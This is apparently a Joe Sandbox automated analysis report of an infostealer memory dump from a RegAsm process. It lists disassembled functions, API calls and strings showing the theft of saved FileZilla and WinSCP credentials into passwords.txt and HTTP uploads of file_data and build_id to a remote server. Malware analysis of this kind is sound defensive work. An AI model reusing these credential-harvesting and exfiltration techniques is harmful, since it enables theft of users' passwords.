Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

lstrlenA.KERNEL32(?), ref: 00405519

Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91

StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,4b74261d834413e886f920a1e9dc5b33,",build_id,00437814,------), ref: 00405C67
lstrlenA.KERNEL32(?), ref: 00405C7A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
HeapAlloc.KERNEL32(00000000), ref: 00405C99
lstrlenA.KERNEL32(?), ref: 00405CA6
_memmove.LIBCMT ref: 00405CB4
lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
_memmove.LIBCMT ref: 00405CD6
lstrlenA.KERNEL32(?), ref: 00405CE4
lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
_memmove.LIBCMT ref: 00405D05
lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
ExitProcess.KERNEL32 ref: 00405E46

Strings

------, xrefs: 0040589D
------, xrefs: 0040573C
", xrefs: 00405C35
------, xrefs: 00405605
4b74261d834413e886f920a1e9dc5b33, xrefs: 004059A7
", xrefs: 0040581B
ERROR, xrefs: 00405D79
--, xrefs: 00405600
", xrefs: 00405AD8
build_id, xrefs: 0040594F
", xrefs: 0040597B
file_data, xrefs: 00405C09
------, xrefs: 00405B5D
ERROR, xrefs: 00405F2F
block, xrefs: 00405E30
------, xrefs: 004059FF

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$4b74261d834413e886f920a1e9dc5b33$ERROR$ERROR$block$build_id$file_data
API String ID: 2638065154-874016578
Opcode ID: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
Instruction ID: a1f310b16752a75a1e3861b17425502ee47d614580a36b5f1e1f8e1f13a41955
Opcode Fuzzy Hash: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
Instruction Fuzzy Hash: 3742E671D401699BDF21FB21DC45ACDB3B9BF04308F0085E6A548B3152DAB86FCA9F98

Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

strtok_s.MSVCRT ref: 0040E77E
GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
lstrlenA.KERNEL32(00000000), ref: 0040E7EA
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
lstrlenA.KERNEL32(00000000), ref: 0040E829
StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
lstrlenA.KERNEL32(00000000), ref: 0040E862
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
lstrlenA.KERNEL32(00000000), ref: 0040E89B
lstrlenA.KERNEL32(?), ref: 0040E901
lstrlenA.KERNEL32(?), ref: 0040E915
lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

Soft: FileZilla, xrefs: 0040E948
<Port>, xrefs: 0040E818
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040E71F
<Pass encoding="base64">, xrefs: 0040E88A
Host: , xrefs: 0040E954
Password: , xrefs: 0040E9AE
<Host>, xrefs: 0040E7D9
<User>, xrefs: 0040E851
passwords.txt, xrefs: 0040EA4D
Login: , xrefs: 0040E98C

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 4146028692-935134978
Opcode ID: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
Instruction ID: 2e9f852a615408e756f1d7d3730d5668bfc6bf7d6dc94c0724fe4efb67adb4f0
Opcode Fuzzy Hash: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
Instruction Fuzzy Hash: 6FA17572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99

Function 00406BB5 Relevance: 63.6, APIs: 20, Strings: 16, Instructions: 598
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
StrCmpCA.SHLWAPI(?), ref: 00406C72
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
lstrlenA.KERNEL32(?,",status,00437998,------,0043798C,",task_id,00437978,------,0043796C,",mode,00437958,------,0043794C), ref: 0040753C
lstrlenA.KERNEL32(?), ref: 0040754B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
HeapAlloc.KERNEL32(00000000), ref: 0040755D
lstrlenA.KERNEL32(?), ref: 0040756A
_memmove.LIBCMT ref: 00407578
lstrlenA.KERNEL32(?), ref: 00407586
lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
_memmove.LIBCMT ref: 004075A1
lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
InternetCloseHandle.WININET(00000000), ref: 0040762C
InternetCloseHandle.WININET(?), ref: 00407638
InternetCloseHandle.WININET(?), ref: 00407644
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

build_id, xrefs: 00407095
status, xrefs: 004074B1
task_id, xrefs: 00407351
------, xrefs: 00406CFC
------, xrefs: 00407145
", xrefs: 0040737D
", xrefs: 004074DD
4b74261d834413e886f920a1e9dc5b33, xrefs: 004070ED
------, xrefs: 0040729F
------, xrefs: 00406E82
", xrefs: 0040721D
mode, xrefs: 004071F1
------, xrefs: 00406FE3
", xrefs: 00406F61
------, xrefs: 004073FF
", xrefs: 004070C1

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$"$"$------$------$------$------$------$------$4b74261d834413e886f920a1e9dc5b33$build_id$mode$status$task_id
API String ID: 3702379033-1397433343
Opcode ID: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
Instruction ID: f28151e3697947f206a0980c25f575650e410a772d733d80a29dba40e216d304
Opcode Fuzzy Hash: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
Instruction Fuzzy Hash: 7552897194016D9ACF61EB62CD46BCCB3B5AF04308F4184E7A51D73161DA746FCA8FA8

Function 00405F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
StrCmpCA.SHLWAPI(?), ref: 00405FF6
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,4b74261d834413e886f920a1e9dc5b33,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
lstrlenA.KERNEL32(?), ref: 0040660C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
HeapAlloc.KERNEL32(00000000), ref: 0040661E
lstrlenA.KERNEL32(?), ref: 0040662B
_memmove.LIBCMT ref: 00406639
lstrlenA.KERNEL32(?), ref: 00406647
lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
_memmove.LIBCMT ref: 00406662
lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
InternetCloseHandle.WININET(00000000), ref: 004066ED
InternetCloseHandle.WININET(?), ref: 004066F9
InternetCloseHandle.WININET(?), ref: 00406705
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

build_id, xrefs: 00406419
", xrefs: 00406445
mode, xrefs: 00406575
", xrefs: 004062E5
", xrefs: 004065A1
------, xrefs: 00406080
------, xrefs: 00406367
4b74261d834413e886f920a1e9dc5b33, xrefs: 00406471
------, xrefs: 004064C9
------, xrefs: 00406206

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$------$------$------$------$4b74261d834413e886f920a1e9dc5b33$build_id$mode
API String ID: 3702379033-484867422
Opcode ID: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
Instruction ID: 82dd920f4857eb4424cccb8e833476094bcda5e32b3baf042c939ae059a0737f
Opcode Fuzzy Hash: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
Instruction Fuzzy Hash: FF22B9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8

Function 0040E186 Relevance: 51.1, APIs: 15, Strings: 14, Instructions: 325
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040E1B7
_memset.LIBCMT ref: 0040E1D7
_memset.LIBCMT ref: 0040E1E8
_memset.LIBCMT ref: 0040E1F9
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9

Strings

UserName, xrefs: 0040E496
HostName, xrefs: 0040E367
Password: , xrefs: 0040E529
Host: , xrefs: 0040E32A
Soft: WinSCP, xrefs: 0040E2FE
Security, xrefs: 0040E253
PortNumber, xrefs: 0040E3BD
passwords.txt, xrefs: 0040E662
UseMasterPassword, xrefs: 0040E24E
Password, xrefs: 0040E515
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E2B3
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E20B
:22, xrefs: 0040E42D
Login: , xrefs: 0040E459

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$Value$Open$Enum
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 3303087153-2798830873
Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5

Function 00418643 Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00418684
GetProcAddress.KERNEL32 ref: 0041869B
GetProcAddress.KERNEL32 ref: 004186B2
GetProcAddress.KERNEL32 ref: 004186C9
GetProcAddress.KERNEL32 ref: 004186E0
GetProcAddress.KERNEL32 ref: 004186F7
GetProcAddress.KERNEL32 ref: 0041870E
GetProcAddress.KERNEL32 ref: 00418725
GetProcAddress.KERNEL32 ref: 0041873C
GetProcAddress.KERNEL32 ref: 00418753
GetProcAddress.KERNEL32 ref: 0041876A
GetProcAddress.KERNEL32 ref: 00418781
GetProcAddress.KERNEL32 ref: 00418798
GetProcAddress.KERNEL32 ref: 004187AF
GetProcAddress.KERNEL32 ref: 004187C6
GetProcAddress.KERNEL32 ref: 004187DD
GetProcAddress.KERNEL32 ref: 004187F4
GetProcAddress.KERNEL32 ref: 0041880B
GetProcAddress.KERNEL32 ref: 00418822
GetProcAddress.KERNEL32 ref: 00418839
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
GetProcAddress.KERNEL32(75A70000,004184C2), ref: 004188AA
GetProcAddress.KERNEL32(75290000,004184C2), ref: 004188C5
GetProcAddress.KERNEL32 ref: 004188DC
GetProcAddress.KERNEL32(75BD0000,004184C2), ref: 004188F7
GetProcAddress.KERNEL32(75450000,004184C2), ref: 00418912
GetProcAddress.KERNEL32(76E90000,004184C2), ref: 0041892D
GetProcAddress.KERNEL32 ref: 00418944

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
